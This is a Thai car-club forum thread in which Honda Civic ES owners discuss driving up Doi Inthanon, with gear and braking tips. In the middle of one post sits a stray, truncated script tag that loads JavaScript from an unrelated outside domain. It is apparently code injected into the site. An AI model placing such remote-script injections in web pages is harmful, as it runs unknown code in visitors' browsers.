ตอบ
pja

เข้าร่วม: 21 มีนา 2011
ตอบ: 934

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 707
ให้คำขอบคุณ: 973

ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 19 พฤศจิกา 2012 10:29 - ES ขึ้นดอยอินทนนท์ไหว ??
อยากไปอีกเหมือนกันคับ เคยไปตั้งแต่สมัยประมาณ 8-9 ปีที่แล้วอ่ะคับ แต่ตอนนั้นนั่งรถสองแถวขึ้นดอยคับ ตอนนั้นคนยังไม่ค่อยเยอะเท่าไร สวยงามมากคับ
ได้รับคำขอบคุณจาก: malmsteen 
Y u s Z a

เข้าร่วม: 09 ตุลา 2008
ตอบ: 536

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 355
ให้คำขอบคุณ: 198

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 19 พฤศจิกา 2012 12:40 - ES ขึ้นดอยอินทนนท์ไหว ??
เคยเอาขึ้นสมัยออกรถมาปีแรกๆ......นั่ง 7 ยังขึ้นได้ แต่รำคาญตอนถึงรอบเกียร์เปลี่ยนนี่ดิเล่นเอาเหวอๆไปเหมือนกันแต่ก็นับถือเจ้า es จริงๆครับ
sarawut

ชื่อเล่น: เอส

เข้าร่วม: 27 เมษา 2009
ตอบ: 586

ได้รับคำขอบคุณ: 507
ให้คำขอบคุณ: 247

ปี: 2003
สี: แดง แรลไล (R-513)
จันทร์, 19 พฤศจิกา 2012 17:24 - ES ขึ้นดอยอินทนนท์ไหว ??
พา es สุดที่รักพิชิด มาเหมือนกันคับ 
durongrit

เข้าร่วม: 02 ธันวา 2008
ตอบ: 85

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 52
ให้คำขอบคุณ: 18

ปี: 2005
จันทร์, 19 พฤศจิกา 2012 19:33 - ES ขึ้นดอยอินทนนท์ไหว ??
สวยมากเลยครับ เห็นแล้วต้องพาไปจัดสักทริปบ้างละ
malmsteen

ชื่อเล่น: เอ็ม

เข้าร่วม: 23 ตุลา 2009
ตอบ: 178

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 159
ให้คำขอบคุณ: 286

ปี: 2003
จันทร์, 19 พฤศจิกา 2012 22:48 - ES ขึ้นดอยอินทนนท์ไหว ??
Thong Thong พิมพ์ว่า:
ไปดอยปุยด้วยหล๋อครับ ผมนึกว่าผมบ้าหลงทางไปคนเดียวทางขึ้นน่ากลัวมาก
ไม่ได้ตั้งใจหลงทางจากดอยสุเทพขึ้นไป น่ากลัวม๊ากกกก ขอบอก

ไม่ได้หลงไปครับ จอดรถไว้ดอยสุเทพ นั่งสองแถวไปครับ

<script src="https://sport32news.com/civicesgroup.js"></
Thanatip

ชื่อเล่น: เค็ก

เข้าร่วม: 16 สิงหา 2011
ตอบ: 376

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 324
ให้คำขอบคุณ: 497

ปี: 2004
อังคาร, 20 พฤศจิกา 2012 11:45 - Re: ES ขึ้นดอยอินทนนท์ไหว ??
ham_ter พิมพ์ว่า:

malmsteen พิมพ์ว่า:
บนดอยอาหาศเริ่มหนาวแล้ว ช่วงปลายปีแบบนี้จะมีสมาชิกถามว่า ES เราจะขึ้นดอยอินทนนท์ไหวรึป่าว ผมก็เป็นคนนึงที่ค้นหากระทู้เก่าๆดูว่ารถเราไปกันได้ไม๊ พอดีมีโอกาสพักร้อนเมื่ออาทิตย์ที่แล้วเลยมีโอกาสได้ลองไปเที่ยว เลยเอามาแชร์ครับ ^_^ รถเราขึ้นไหวครับ เก่ากว่าเรายังขึ้นได้เลย แต่ผมไปวันธรรมดาไม่ค่อยมีรถเลย เลยเร่งยาวๆ ได้ -_- แต่ถ้าเป็นช่วงหยุดยาวหรือปีใหม่รถเยอะๆ ก็อาจจะเหนื่อยกว่าหน่อยครับ ฝากตอนขาลงแล้วกันครับเช็คระบบเบรคกันซักหน่อยครับ ใครแรงหลบให้แซงเลยครับ เรา D2 D3 กันไปครับ เบรคร้อนมากครับ ยังไงก็เที่ยวให้สนุกนะครับ

ปล.ผมไม่เคยขับขึ้นดอยไหนเลยครับ ดอยแรกเลย ขึ้นแต่ที่จอดรถ -_-" รถผม AT 1.7 วิ่งมาสองแสนกว่าโลแล้วครับ ท่อสปูนก็อป ช่วงสุดท้ายชันยาวๆท่อดังลั่นเลยครับ เขิลนิดหน่อยครับ คันอื่นเค้าท่อเดิมๆไปกันเงียบๆ 555

ลาก D3 ขึ้น สบายๆ จ้า ถ้าตรงเจดีย์คู่ก็ลากหน่อย อุอุ
ปล.ขึ้นไปหลังปีใหม่ แม่ขะนิ้ง ( น้ำค้างแข็ง ) เต็มไปหมดเลยนะ อุอุ

โหดจังเลยคับ ผมยังไม่เคยขึ้นดอยอินทนนท์ แต่เคยเอาขึ้นดอยอ่างขางคับ ว่าจะลองดู สิ้นปีนี้คับ 
body19

เข้าร่วม: 27 มกรา 2010
ตอบ: 529

ได้รับคำขอบคุณ: 332
ให้คำขอบคุณ: 280

ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พฤหัส, 6 ธันวา 2012 00:04 - ES ขึ้นดอยอินทนนท์ไหว ??
Thanatip พิมพ์ว่า:
ham_ter พิมพ์ว่า:

malmsteen พิมพ์ว่า:
บนดอยอาหาศเริ่มหนาวแล้ว ช่วงปลายปีแบบนี้จะมีสมาชิกถามว่า ES เราจะขึ้นดอยอินทนนท์ไหวรึป่าว ผมก็เป็นคนนึงที่ค้นหากระทู้เก่าๆดูว่ารถเราไปกันได้ไม๊ พอดีมีโอกาสพักร้อนเมื่ออาทิตย์ที่แล้วเลยมีโอกาสได้ลองไปเที่ยว เลยเอามาแชร์ครับ ^_^ รถเราขึ้นไหวครับ เก่ากว่าเรายังขึ้นได้เลย แต่ผมไปวันธรรมดาไม่ค่อยมีรถเลย เลยเร่งยาวๆ ได้ -_- แต่ถ้าเป็นช่วงหยุดยาวหรือปีใหม่รถเยอะๆ ก็อาจจะเหนื่อยกว่าหน่อยครับ ฝากตอนขาลงแล้วกันครับเช็คระบบเบรคกันซักหน่อยครับ ใครแรงหลบให้แซงเลยครับ เรา D2 D3 กันไปครับ เบรคร้อนมากครับ ยังไงก็เที่ยวให้สนุกนะครับ

ปล.ผมไม่เคยขับขึ้นดอยไหนเลยครับ ดอยแรกเลย ขึ้นแต่ที่จอดรถ -_-" รถผม AT 1.7 วิ่งมาสองแสนกว่าโลแล้วครับ ท่อสปูนก็อป ช่วงสุดท้ายชันยาวๆท่อดังลั่นเลยครับ เขิลนิดหน่อยครับ คันอื่นเค้าท่อเดิมๆไปกันเงียบๆ 555

ลาก D3 ขึ้น สบายๆ จ้า ถ้าตรงเจดีย์คู่ก็ลากหน่อย อุอุ
ปล.ขึ้นไปหลังปีใหม่ แม่ขะนิ้ง ( น้ำค้างแข็ง ) เต็มไปหมดเลยนะ อุอุ

โหดจังเลยคับ ผมยังไม่เคยขึ้นดอยอินทนนท์ แต่เคยเอาขึ้นดอยอ่างขางคับ ว่าจะลองดู สิ้นปีนี้คับ 

อ่างขางชันกว่าอินทนนท์เยอะครับ ปีนี้ตั้งใจจะไปอินทนนท์ ม่อนเเจ่ม ห้วยน้ำดัง
ได้รับคำขอบคุณจาก: koobe 
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.